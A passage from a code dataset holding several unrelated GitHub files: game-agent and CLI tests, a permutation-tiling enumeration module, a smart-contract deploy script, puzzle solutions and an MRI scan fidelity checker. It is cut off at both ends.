test_list():\n \"\"\"tests all test cases\"\"\"\n azir_test()\n chosen_test()\n end_of_turn_actions_test()\n\n championDuplicatorTest()\n magneticRemoverTest()\n reforgerTest()\n\n thiefsGloveCombatTest()\n thiefsGlovesTest()\n\n kaynTests()\n\n level2Champion()\n level3Champion()\n levelChampFromField()\n\n buyExp()\n # spamExp()\n\n # Problem: Interest gets calculated after base income is added\n incomeTest1()\n # Problem: Interest rate not capped\n incomeTest2()\n incomeTest3()\n incomeTest4()\n\n # I would like to go over move commands again before writing test code for that\n pass\n","repo_name":"silverlight6/TFTMuZeroAgent","sub_path":"UnitTests/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":13482,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"53"}
+{"seq_id":"14961130302","text":"\"\"\"Test reports monthly-usage command.\"\"\"\n\n# pylint: disable=wrong-import-order, import-error\nimport operator\nimport os\n\nfrom click.testing import CliRunner\n\nfrom gencove.client import APIClient, APIClientError # noqa: I100\nfrom gencove.command.reports.cli import monthly_usage\nfrom gencove.tests.decorators import assert_authorization\nfrom gencove.tests.filters import (\n filter_aws_headers,\n filter_jwt,\n replace_gencove_url_vcr,\n)\nfrom gencove.tests.reports.vcr.filters import (\n filter_monthly_usage_report_request,\n filter_report_response_body,\n filter_report_response_filename,\n)\nfrom gencove.tests.upload.vcr.filters import filter_volatile_dates\nfrom gencove.tests.utils import get_response_from_vcr_dict, get_vcr_response\n\nimport pytest\n\nfrom vcr import VCR\n\n\n@pytest.fixture(scope=\"module\")\ndef vcr_config():\n \"\"\"VCR configuration.\"\"\"\n return {\n \"cassette_library_dir\": \"gencove/tests/reports/vcr\",\n \"filter_headers\": [\"Authorization\", \"Content-Length\", \"User-Agent\", \"ETag\"],\n \"filter_post_data_parameters\": [\n (\"email\", \"email@example.com\"),\n (\"password\", \"mock_password\"),\n ],\n \"match_on\": [\"method\", \"scheme\", \"port\", \"path\", \"query\"],\n \"path_transformer\": VCR.ensure_suffix(\".yaml\"),\n \"before_record_request\": [\n replace_gencove_url_vcr,\n filter_monthly_usage_report_request,\n ],\n \"before_record_response\": [\n filter_jwt,\n filter_aws_headers,\n filter_volatile_dates,\n filter_report_response_body,\n filter_report_response_filename,\n ],\n }\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report success case\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n res = runner.invoke(\n monthly_usage,\n [\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__success_dates(\n credentials, mocker, recording, vcr\n): # pylint: disable=too-many-arguments,too-many-locals,unused-argument\n \"\"\"Test monthly usage report success case with requested dates\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n return_value=response,\n )\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n outfile = \"tempdir/test.csv\"\n res = runner.invoke(\n monthly_usage,\n [\n \"--output-filename\",\n f\"{outfile}\",\n \"--from\",\n \"2021-09\",\n \"--to\",\n \"2021-10\",\n *credentials,\n ],\n )\n\n with open(outfile, \"r\", encoding=\"utf-8\") as fileobj:\n contents = fileobj.readlines()\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"Saved organization monthly usage report CSV\" in res.output\n\n # Confirm columns are as expected\n columns_row = contents[0]\n columns = columns_row.strip().split(\",\")\n assert \"year\" in columns\n assert \"month\" in columns\n assert \"succeeded_samples\" in columns\n assert \"failed_samples\" in columns\n\n # should be two months of data + headers\n assert len(contents) == 3\n\n\n@pytest.mark.vcr\n@assert_authorization\ndef test_monthly_usage__bad_date( # pylint: disable=too-many-arguments,unused-argument\n credentials, mocker, recording, vcr\n):\n \"\"\"Test monthly usage report with bad date value\"\"\"\n runner = CliRunner()\n if not recording:\n monthly_usage_dict = get_vcr_response(\n \"/api/v2/organization-monthly-usage-report/\",\n vcr,\n operator.contains,\n just_body=False,\n )\n response = get_response_from_vcr_dict(monthly_usage_dict)\n\n # Need to reconstruct the raw response\n mocked_monthly_usage = mocker.patch.object(\n APIClient,\n \"get_organization_monthly_usage_report\",\n side_effect=APIClientError(\n message=response.content,\n status_code=response.status_code,\n ),\n return_value=response,\n )\n\n with runner.isolated_filesystem():\n os.mkdir(\"tempdir\")\n # invoke without --to param\n res = runner.invoke(\n monthly_usage,\n [\n \"--from\",\n \"2023-01\",\n *credentials,\n ],\n )\n\n assert res.exit_code == 0\n if not recording:\n mocked_monthly_usage.assert_called_once()\n assert \"There was an error retrieving the monthly usage report\" in res.output\n assert (\n \"Must provide both 'from' and 'to' query parameters, or neither\" in res.output\n )\n","repo_name":"gncv/gencove-cli","sub_path":"gencove/tests/reports/test_reports_monthly_usage.py","file_name":"test_reports_monthly_usage.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"39012568249","text":"import abc\nfrom collections import deque\nfrom itertools import chain\nfrom typing import TYPE_CHECKING, Any, Dict, FrozenSet, Iterable, Optional\n\nimport requests\nfrom sympy import Expr, Symbol, diff, simplify, sympify, var\n\nfrom comb_spec_searcher.utils import taylor_expand\nfrom permuta import Av\nfrom permuta.permutils.symmetry import lex_min\nfrom tilings.exception import InvalidOperationError\nfrom tilings.griddedperm import GriddedPerm\nfrom tilings.misc import is_tree\n\nif TYPE_CHECKING:\n from tilings import Tiling\n\nx = Symbol(\"x\")\n\n\nclass Enumeration(abc.ABC):\n \"\"\"\n General representation of a strategy to enumerate tilings.\n \"\"\"\n\n def __init__(self, tiling: \"Tiling\"):\n self.tiling = tiling\n\n @abc.abstractmethod\n def verified(self) -> bool:\n \"\"\"\n Returns True if enumeration strategy works for the tiling.\n \"\"\"\n raise NotImplementedError\n\n def get_genf(self, **kwargs) -> Expr:\n \"\"\"\n Returns the generating function for the tiling.\n\n Raises an InvalidOperationError if the tiling is not verified.\n \"\"\"\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n raise NotImplementedError\n\n def __repr__(self) -> str:\n return \"Enumeration for:\\n\" + str(self.tiling)\n\n\nclass LocalEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a locally enumerable tiling.\n\n A tiling is locally enumerable if the tiling has no crossing obstructions\n or requirements.\n\n There's not universal way of describing a tiling that is locally enumerable\n with a specification.\n \"\"\"\n\n def __init__(self, tiling, no_req=False):\n super().__init__(tiling)\n self.no_req = no_req\n\n def verified(self) -> bool:\n if self.no_req and self.tiling.requirements:\n return False\n return (\n all(gp.is_single_cell() for gp in self.tiling.obstructions)\n and all(self._req_is_single_cell(req) for req in self.tiling.requirements)\n and all(\n gp.is_single_cell()\n for gp in chain.from_iterable(\n ass.gps for ass in self.tiling.assumptions\n )\n )\n )\n\n @staticmethod\n def _req_is_single_cell(req: Iterable[GriddedPerm]) -> bool:\n \"\"\"\n Returns True if all the gridded perm in the iterable are single cell and in\n the same cell.\n \"\"\"\n req_iter = iter(req)\n gp0 = next(req_iter)\n if not gp0.is_single_cell():\n return False\n cell = gp0.pos[0]\n all_cells = chain.from_iterable(gp.pos for gp in req_iter)\n return all(c == cell for c in all_cells)\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-return-statements\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n\n funcs: Optional[Dict[\"Tiling\", Any]] = kwargs.get(\"funcs\")\n if funcs is None:\n funcs = {}\n if self.tiling.requirements:\n reqs = self.tiling.requirements[0]\n avoided = self.tiling.__class__(\n self.tiling.obstructions + reqs,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n without = self.tiling.__class__(\n self.tiling.obstructions,\n self.tiling.requirements[1:],\n self.tiling.assumptions,\n )\n avgf = LocalEnumeration(avoided).get_genf(funcs=funcs)\n wogf = LocalEnumeration(without).get_genf(funcs=funcs)\n return wogf - avgf\n if self.tiling in funcs:\n return funcs[self.tiling]\n # also return something entirely different if the root class/not verified\n if self.tiling.dimensions == (1, 1):\n if self.tiling.is_epsilon():\n return 1\n if self.tiling == self.tiling.__class__.from_string(\"01_10\"):\n return 1 + x\n basis = [ob.patt for ob in self.tiling.obstructions]\n basis_str = \"_\".join(map(str, lex_min(basis)))\n uri = f\"https://permpal.com/perms/raw_data_json/basis/{basis_str}\"\n request = requests.get(uri, timeout=10)\n if request.status_code == 404:\n raise NotImplementedError(f\"No entry on permpal for {Av(basis)}\")\n data = request.json()\n if data[\"generating_function_sympy\"] is None:\n raise NotImplementedError(\n f\"No explicit generating function on permpal for {Av(basis)}\"\n )\n return sympify(data[\"generating_function_sympy\"])\n gf = None\n if MonotoneTreeEnumeration(self.tiling).verified():\n gf = MonotoneTreeEnumeration(self.tiling).get_genf()\n if DatabaseEnumeration(self.tiling).verified():\n gf = DatabaseEnumeration(self.tiling).get_genf()\n if gf is not None:\n funcs[self.tiling] = gf\n return gf\n # TODO: should this create a spec as in the strategy?\n raise NotImplementedError(\n f\"Not sure how to enumerate the tiling:\\n{self.tiling}\"\n )\n\n\nclass MonotoneTreeEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a monotone tree tiling.\n\n A tiling is a monotone tree if it is local, its cell graph is a tree and\n all but possibly one cell are monotone.\n\n A monotone tree tiling can be described by a tree where the verified object\n are the cells of the tiling.\n \"\"\"\n\n _tracking_var = var(\"t\")\n\n def verified(self):\n no_req_list = all(len(rl) == 1 for rl in self.tiling.requirements)\n num_non_monotone = sum(\n 1 for c in self.tiling.active_cells if not self.tiling.is_monotone_cell(c)\n )\n return (\n self.tiling.dimensions != (1, 1)\n and LocalEnumeration(self.tiling).verified()\n and no_req_list\n and num_non_monotone <= 1\n and is_tree(self.tiling.active_cells, self.tiling.cell_graph())\n )\n\n def _cell_tree_traversal(self, start):\n \"\"\"\n Traverse the tree by starting at `start` and always visiting an entire\n row or column before going somewhere else.\n\n The start vertices is not yielded.\n \"\"\"\n queue = deque(\n chain(\n self.tiling.cells_in_col(start[0]), self.tiling.cells_in_row(start[1])\n )\n )\n visited = set([start])\n while queue:\n cell = queue.popleft()\n if cell not in visited:\n yield cell\n visited.add(cell)\n queue.extend(self.tiling.cells_in_row(cell[1]))\n queue.extend(self.tiling.cells_in_col(cell[0]))\n\n def _visted_cells_aligned(self, cell, visited):\n \"\"\"\n Return the cells that are in visited and in the same row or column as\n `cell`.\n \"\"\"\n row_cells = self.tiling.cells_in_row(cell[1])\n col_cells = self.tiling.cells_in_col(cell[0])\n return (c for c in visited if (c in row_cells or c in col_cells))\n\n def get_genf(self, **kwargs) -> Any:\n # pylint: disable=too-many-locals\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n if self.tiling.extra_parameters:\n raise NotImplementedError(\n \"Not implemented monotone verified with extra parameters.\"\n )\n try:\n start = next(\n c\n for c in self.tiling.active_cells\n if not self.tiling.is_monotone_cell(c)\n )\n except StopIteration:\n start = next(iter(self.tiling.active_cells))\n start_basis = self.tiling.cell_basis()[start][0]\n start_reqs = [[p] for p in self.tiling.cell_basis()[start][1]]\n start_tiling = self.tiling.from_perms(\n obstructions=start_basis, requirements=start_reqs\n )\n start_gf = start_tiling.get_genf()\n F = start_gf.subs({x: x * self._cell_variable(start)})\n visited = set([start])\n for cell in self._cell_tree_traversal(start):\n interleaving_cells = self._visted_cells_aligned(cell, visited)\n substitutions = {\n scv: scv * self._tracking_var\n for scv in map(self._cell_variable, interleaving_cells)\n }\n F_tracked = F.subs(substitutions)\n minlen, maxlen = self._cell_num_point(cell)\n if maxlen is None:\n F = self._interleave_any_length(F_tracked, cell)\n if minlen > 0:\n F -= self._interleave_fixed_lengths(F_tracked, cell, 0, minlen - 1)\n else:\n F = self._interleave_fixed_lengths(F_tracked, cell, minlen, maxlen)\n visited.add(cell)\n F = simplify(\n F.subs({v: 1 for v in F.free_symbols if v != x})\n ) # type: ignore[operator]\n # A simple test to warn us if the code is wrong\n if __debug__:\n lhs = taylor_expand(F, n=6)\n rhs = [len(list(self.tiling.objects_of_size(i))) for i in range(7)]\n assert lhs == rhs, f\"Bad genf\\n{lhs}\\n{rhs}\"\n return F\n\n @staticmethod\n def _cell_variable(cell):\n \"\"\"\n Return the appropriate variable to track the number of point in the\n given cell.\n \"\"\"\n return var(f\"y_{cell[0]}_{cell[1]}\")\n\n def _interleave_any_length(self, F, cell):\n \"\"\"\n Return the generating function for interleaving any number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n cell_var = self._cell_variable(cell)\n gap_filler = 1 / (1 - x * cell_var)\n return F.subs({self._tracking_var: gap_filler}) * gap_filler\n\n def _interleave_fixed_lengths(self, F, cell, min_length, max_length):\n \"\"\"\n Return the generating function for interleaving between min_point and\n max_point (both included) number of point of\n a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n return sum(\n self._interleave_fixed_length(F, cell, i)\n for i in range(min_length, max_length + 1)\n )\n\n def _interleave_fixed_length(self, F, cell, num_point):\n \"\"\"\n Return the generating function for interleaving num_point\n number of point of a monotone sequence into the region tracked by\n `MonotoneTreeEnumeration._tracking_var` in `F`.\n A variable is added to track the number of point in cell.\n \"\"\"\n new_genf = self._tracking_var**num_point * F\n for i in range(1, num_point + 1):\n new_genf = diff(new_genf, self._tracking_var) / i\n new_genf *= self._cell_variable(cell) ** num_point\n new_genf *= x**num_point\n return new_genf.subs({self._tracking_var: 1})\n\n def _cell_num_point(self, cell):\n \"\"\"\n Return a pair of integer `(min, max)` that describe the possible\n number of point in the cell. If the number of point is unbounded,\n `max` is None.\n\n We assume that the cell is monotone\n \"\"\"\n obs, reqs = self.tiling.cell_basis()[cell]\n ob_lens = sorted(map(len, obs))\n assert ob_lens[0] == 2, \"Unexpected obstruction\"\n assert len(reqs) <= 1, \"Unexpected number of requirement\"\n if len(obs) == 1:\n maxlen = None\n elif len(obs) == 2:\n maxlen = ob_lens[1] - 1\n else:\n raise RuntimeError(\"Unexpected number of obstructions\")\n if not reqs:\n minlen = 0\n elif len(reqs) == 1:\n minlen = len(reqs[0])\n else:\n raise RuntimeError(\"Unexpected number of requirements\")\n return minlen, maxlen\n\n\nclass DatabaseEnumeration(Enumeration):\n \"\"\"\n Enumeration strategy for a tilings that are in the database.\n\n There is not always a specification for a tiling in the database but you can always\n find the generating function and the minimal polynomial in the database.\n \"\"\"\n\n API_ROOT_URL = \"https://api.permpal.com\"\n all_verified_tilings: FrozenSet[bytes] = frozenset()\n num_verified_request = 0\n\n @classmethod\n def load_verified_tiling(cls):\n \"\"\"\n Load all the verified tiling in the attribute `all_verified_tilings` of\n the class.\n\n That speeds up the verification test.\n \"\"\"\n if not DatabaseEnumeration.all_verified_tilings:\n uri = f\"{cls.API_ROOT_URL}/all_verified_tilings\"\n response = requests.get(uri, timeout=10)\n response.raise_for_status()\n compressed_tilings = map(bytes.fromhex, response.json())\n cls.all_verified_tilings = frozenset(compressed_tilings)\n\n def _get_tiling_entry(self):\n \"\"\"\n Retrieve the tiling entry from the database. Returns None if the tiling\n is not in the database.\n \"\"\"\n key = self.tiling.to_bytes().hex()\n search_url = f\"{DatabaseEnumeration.API_ROOT_URL}/verified_tiling/key/{key}\"\n r = requests.get(search_url, timeout=10)\n if r.status_code == 404:\n return None\n r.raise_for_status()\n return r.json()\n\n def verified(self):\n \"\"\"\n Check if a tiling is verified.\n\n After a 100 checks it loads all the saved tiling from the database to\n speed up future requests.\n \"\"\"\n DatabaseEnumeration.num_verified_request += 1\n if DatabaseEnumeration.all_verified_tilings:\n return self.tiling.to_bytes() in DatabaseEnumeration.all_verified_tilings\n if DatabaseEnumeration.num_verified_request > 10:\n DatabaseEnumeration.load_verified_tiling()\n return self._get_tiling_entry() is not None\n\n def get_genf(self, **kwargs) -> Any:\n if not self.verified():\n raise InvalidOperationError(\"The tiling is not verified\")\n return sympify(self._get_tiling_entry()[\"genf\"])\n","repo_name":"PermutaTriangle/Tilings","sub_path":"tilings/algorithms/enumeration.py","file_name":"enumeration.py","file_ext":"py","file_size_in_byte":14317,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"32380297932","text":"from brownie import *\nimport os\n\ndef deploy_backedby(deployer):\n from0 = {'from': deployer}\n profiles = BBProfiles.deploy(from0)\n posts = BBPosts.deploy(profiles, from0)\n tiers = BBTiers.deploy(profiles, from0)\n subfactory = BBSubscriptionsFactory.deploy(profiles, tiers, deployer, from0)\n\n gasOracle = DebugGasOracle.deploy(from0)\n subfactory.setGasOracle(gasOracle, from0).wait(2)\n \n tokens = [\n {'name': \"USDC\", 'address': \"0x8f7116CA03AEB48547d0E2EdD3Faa73bfB232538\"},\n {'name': \"USDT\", 'address': \"0x0afF29eeCf746EC239C8DA3E8e630F46FCaBC48e\"},\n {'name': \"DAI\", 'address': \"0xd393b1E02dA9831Ff419e22eA105aAe4c47E1253\"},\n {'name': \"TUSD\", 'address': \"0x3c75bd0e659b8bd426b3b9a1d93b75bb9c97de10\"}\n ]\n\n for i, token in enumerate(tokens):\n tx = subfactory.deploySubscriptions(token['address'], from0)\n tx.wait(2)\n token['subaddress'] = subfactory.getDeployedSubscriptions(token['address'])\n #remove gas change for live\n #subfactory.setSubscriptionFee(token['address'], 1, from0)\n\n print(\"profiles\", profiles)\n print(\"posts\", posts)\n print(\"tiers\", tiers)\n print(\"subfactory\", subfactory)\n print(\"gas oracle\", gasOracle)\n\n \n for i, token in enumerate(tokens):\n print(token['name'], token['address'], \"=>\", token['subaddress'])\n\n\ndef main():\n \n if(os.environ.get(\"DEPLOYER_PRIVATEKEY\") != None):\n deployer = accounts.add(os.environ.get(\"DEPLOYER_PRIVATEKEY\"))\n elif(len(accounts) > 0):\n deployer = accounts[0]\n\n if(deployer.balance() >= 1e17):\n deploy_backedby(deployer)","repo_name":"backedby/v1-contracts","sub_path":"scripts/josh/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"39241896127","text":"from math import log10\nfrom time import time\n\ndef main():\n Ln, n, a, b = 1000, 3, 2, 0\n for i in range(2, Ln+1):\n n, a = n + 2*a, n + a\n if int(log10(n)) > int(log10(a)): \n b += 1\n return b\n\nif __name__==\"__main__\":\n start = time()\n print(f\"\\nAnswer: { main() }\")\n print(f\"Time Taken: { time() - start }\\n\")\n\n \n","repo_name":"fermihacker/Project-Euler","sub_path":"Python/Problem057.py","file_name":"Problem057.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"30421383437","text":"from collections import deque\n\nN,M = map(int,input().split())\n\ngraph = []\n\nfor i in range(N):\n k = list(input())\n for j in range(M):\n if k[j] == 'B':\n b = [i,j]\n if k[j] == 'R':\n r = [i,j]\n graph.append(k)\n\n\nvisited = [[[[False]*M for i in range(N)] for i in range(M) ] for i in range(N)]\n\ndef move(x,y,dx,dy):\n c = 0\n\n while graph[x+dx][y+dy] != '#' and graph[x][y] != 'O':\n x +=dx\n y +=dy\n c+=1\n return x,y,c \n\n\ndef bfs():\n dx = [1,-1,0,0]\n dy = [0,0,1,-1]\n q = deque()\n q.append((r[0],r[1],b[0],b[1],1))\n visited[r[0]][r[1]][b[0]][b[1]] = True\n\n while q:\n rx,ry,bx,by,cnt = q.popleft()\n if cnt > 10 :\n break\n \n for i in range(4):\n nrx,nry,rc = move(rx,ry,dx[i],dy[i])\n nbx,nby,bc = move(bx,by,dx[i],dy[i])\n if graph[nbx][nby] != 'O':\n if graph[nrx][nry] == 'O':\n print(1)\n return \n if nrx == nbx and nry == nby :\n if rc > bc :\n nrx -=dx[i]\n nry -=dy[i]\n else:\n nbx -=dx[i]\n nby -=dy[i]\n if visited[nrx][nry][nbx][nby] == False:\n visited[nrx][nry][nbx][nby] = True\n q.append((nrx,nry,nbx,nby,cnt+1))\n \n print(0)\n return \n\nbfs()\n\n \n","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/graphs/13459.py","file_name":"13459.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4475884207","text":"# PURPOSE\n# This file reads a json template file and constructs a dictionary of\n# field-value pairs. When passed a relevant fidelity file, it compares the\n# empirical field values in it against this dictionary and returns which tests\n# it passed and which it failed\n# Author: Austin Marcus (axm6053@psu.edu)\n\n# Assumptions being made:\n##Questionable:\n## The target json sub-elemnt name should exactly match oart of the file name\n#\t# however, this may be inconsistent. Best match is with the SeriesDescription element\n## a \"-\" in json fields is equivalent to a \"_\" --> should remove this assumption. made because of mismatch with SeriesDescription.\n#\n##Valid:\n## values from json template that are a single element vector (e.g. [5]) are equivalent to the single element (data from experimental json files is not bracketed) --> valid\n## if a list (dim or pixdim) is longer in the experimental data than the list given in the template json, only look at up till the length of the template list\n\nimport json\nimport os\nimport sys\nfrom . import helper\n\nTOL = .01\nmanual_verify = False\n\n# this class organizes the data associated with a single file analysis: a comparison of a single file against the json template file\nclass fileAnalysis:\n\n\tdef __init__(self, filename, fileSuffix, task, scanType, subID, runNum, fidelityChecks):\n\t\tself.filename = filename # the filename, not the path\n\t\tself.fileSuffix = fileSuffix # the suffix of the file (json or nii)\n\t\tself.task = task # the task done during the scan. (rest_post, ...)\n\t\tself.scanType = scanType # the type of scan done. (bold or sbref)\n\t\tself.subID = subID\n\t\tself.fidelityChecks = fidelityChecks # array of fidelity_check objects\n\t\tself.runNum = runNum # run number for the current task\n\t\n\t# INPUT:\n\t#\tother: a fileAnalysis object\n\t# OUTPUT:\n\t#\tTrue if the only thing different between this fileAnalysis and the other is their file suffix. that is, they represent the same scan, just one is the nifti file and the other is the json file\n\t#\tFalse otherwise\n\tdef sameScan(self, other):\n\t\tif self.task == other.task and self.scanType == other.scanType and self.subID == other.subID and helper.getUpperPathFromPath(self.filename) == helper.getUpperPathFromPath(other.filename) and self.runNum == other.runNum:\n\t\t\treturn True\n\t\treturn False\n\n\tdef print(self):\n\t\tprint(\"Scan type: \" + self.task + \"\\nFile type: \" + self.scanType + \"\\nFile suffix: \" + self.fileSuffix + \"\\nSubject Id: \" + str(self.subID) + \"\\nRun number\" + str(self.runNum))\n\t\tprint(\"\\t\" + str(self.fidelityChecks))\n\t\tprint()\n\n# fed an experimental json file and compares against values\nclass fidelityTemplate:\n\t\n\tdef __init__(self, jsonFileName):\n\t\t#print(\"in fidelityTemplate\")\n\t\tf = open(jsonFileName, \"r\")\n\n\t\t# convert raw json to dictionary\n\t\tself.data = json.load(f)\n\t\tfor dict1 in self.data:\n\t\t\tfor key1 in self.data[dict1]:\n\t\t\t\tfor key2 in self.data[dict1][key1]:\n\t\t\t\t\tself.data[dict1][key1][key2] = self.interpret(self.data[dict1][key1][key2])\n\t\n\t# takes as input a string, and attempts to convert it to a number\n\t# if given a list with one element, will break it out of the list as well\n\tdef interpret(self, data):\n\n\t\tif type(data) == list and len(data) == 1: # breaks out single element list\n\t\t\tdata = data[0]\n\t\t\n\t\tif type(data) == list:\n\t\t\t# iterate on each\n\t\t\tfor i in range(len(data)):\n\t\t\t\tdata[i] = self._interpret(data[i])\n\n\t\telse: # just do it once\n\t\t\tdata = self._interpret(data)\n\n\t\treturn data\n\n\tdef _interpret(self, data):\n\t\ttry: # tries to convert to number\n\t\t\tdata = float(data)\n\t\texcept: \n\t\t\t#data = data.replace(\"-\",\"_\") # assuming it must be a string at this point if not a number\n\t\t\tpass\n\n\t\treturn data\n\t\t\n\t# decides how to get data from given file\n\tdef getExData(self, exFileName, fileSuffix):\n\t\t# select wether comparing to json file or nifti file \n\t\tif fileSuffix == \"json\":\n\t\t\t\n\t\t\tf = open(exFileName, \"r\")\n\t\t\texData = json.load(f)\n\n\t\telif fileSuffix == \"nifti\": \n\t\t\texData = {}\n\t\t\traw = os.popen(\"fslhd \" + str(exFileName)).read()\n\t\t\tfor line in raw.split(\"\\n\"):\n\t\t\t\tline = line.split(\"\\t\")\n\t\t\t\tlineParts = list(filter(lambda x: x != \"\\t\" and x != \"\", line))\n\t\t\t\tif len(lineParts) != 2:\n\t\t\t\t\tcontinue\n\t\n\t\t\t\tlineParts[1] = self.interpret(lineParts[1])\n\t\t\n\t\t\t\t# consider aggregating specific fields into array to match format of desired json\n\t\t\t\tspecs = [\"dim\", \"pixdim\"]\n\t\t\t\tmatched = False\n\t\t\t\tfor i in specs:\n\t\t\t\t\tif i == lineParts[0][:len(i)]: #match\n\t\t\t\t\t\tmatched = True\n\t\t\t\t\t\t# if first one, initialize\n\t\t\t\t\t\tif exData.get(i) == None:\n\t\t\t\t\t\t\texData[i] = []\n\t\t\t\t\t\texData[i].append(lineParts[1])\n\t\t\t\t\t\t\t\n\t\t\t\tif not matched:\n\t\t\t\t\texData[lineParts[0]] = lineParts[1]\n\n\t\treturn exData\n\n\t# returns the scan type (rest_pre, rest_post) by extraction from filename\n\t# returns file type (json or nifti) by checking file suffix\n\t# returns subject ID number\n \t # return run number from filename\n\tdef parseFileName(self, filename):\n\t\tsubID = helper.getSubjectIdOfPath(filename)\n\t\ttask = helper.getTaskFromFilename(filename)\n\t\trunNum = helper.getRunNumberFromFilename(filename)\n\t\tif task == \"T1w\":\n\t\t\tscanType = \"---\"\n\t\telse:\n\t\t\tscanType = helper.getScanType(filename)\n\t\tfileSuffix = helper.getFileSuffix(filename)\n\t\t\n\t\treturn task, fileSuffix, subID, scanType, runNum\n\n\tdef guessIsKey(self, key, guess):\n\t\tkey_mod = key.replace('_', '').replace('-', '').lower()\n\t\tguess = guess.replace('_', '').replace('-', '').lower()\n\n\t\treturn key_mod == guess\n\n\tdef isTaskInTemplate(self, task):\n\t\t# check if task is specified in template file\n\t\ttry:\n\t\t\tself.data[task]\n\t\t\treturn True\n\t\texcept:\n\t\t\tfor key in list(self.data.keys()):\n\t\t\t\tif self.guessIsKey(key, task):\n\t\t\t\t\treturn key\n\t\t\treturn False\n\n\t# pass file name to compare object. \n\t# checks that target fields match fields in the data file\n\t# returns a 3-tuple: (task, subID, output)\n\t# \t\toutput: array of 2-tuples: (field, [0,1])\n\tdef compareToFile(self, exFileName):\n\t\t# parse filename to get scan and file type\n\t\ttask, fileSuffix, subID, scanType, runNum = self.parseFileName(exFileName)\n\t\tif task == None:\n\t\t\treturn None\n\n\t\tret = self.isTaskInTemplate(task)\n\t\tif ret == False:\n\t\t\treturn None\n\t\telif ret != True:\n\t\t\ttask = ret\n\t\n\t\t# task name in template file has _sbref for sbref files\n\t\tif scanType == \"sbref\":\n\t\t\ttaskTemp = task + \"_sbref\"\n\t\telse:\n\t\t\ttaskTemp = task\n\n\t\t# get the data from the file\n\t\texData = self.getExData(exFileName, fileSuffix)\n\t\t# select which set of fidelity checks applies to this file\n\t\tchecks = self.data[taskTemp][fileSuffix]\n\t\t\n\t\toutput = []\n\t\tif (manual_verify):\n\t\t\tprint(\"file: \" + exFileName)\n\t\tfor key in checks: # attempting to check only based on fields present in template file; assumption that data files should have a superset\n\t\t\tif (manual_verify):\n\t\t\t\tprint(\"key: \" + key + \"\\n\\ttemplt: \" + str(checks[key]) + \"\\n\\tactual: \", end=\"\")\n\t\t\tcur_check = helper.fidelity_check(key)\n\t\t\t# check if key in data file\n\t\t\ttry:\n\t\t\t\texData[key]\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(exData[key], end=\"\\n\")\n\t\t\texcept:\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"not present\", end=\"\\n\")\n\t\t\t\tcur_check.failCheck(str(checks[key]) + helper.fidelity_check.diff_delim + str(\"not present\"))\n\t\t\t\toutput.append(cur_check)\n\t\t\t\tcontinue\n\n\t\t\tequal, indicies = self.compareObjects(exData[key], checks[key])\n\t\t\tif equal:\n\t\t\t\tcur_check.passCheck()\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t0\", end=\"\")\n\t\t\telse:\n\t\t\t\t# if it differed by an element in a list, pass the index\n\t\t\t\tif indicies != None:\n\t\t\t\t\t# build string: \"/@:...\"\n\t\t\t\t\tresult = \"\"\n\t\t\t\t\tfor i in indicies:\n\t\t\t\t\t\tresult += (\"%s%s%s%s%d\" % (str(checks[key][i]), helper.fidelity_check.diff_delim, str(exData[key][i]), helper.fidelity_check.addr_char, i))\n\t\t\t\t\t\tresult += \":\"\n\t\t\t\t\tresult = result[:-1]\n\n\t\t\t\t\tcur_check.failCheck(result)\n\t\t\t\telse:\n\t\t\t\t\tcur_check.failCheck(str(checks[key]) + 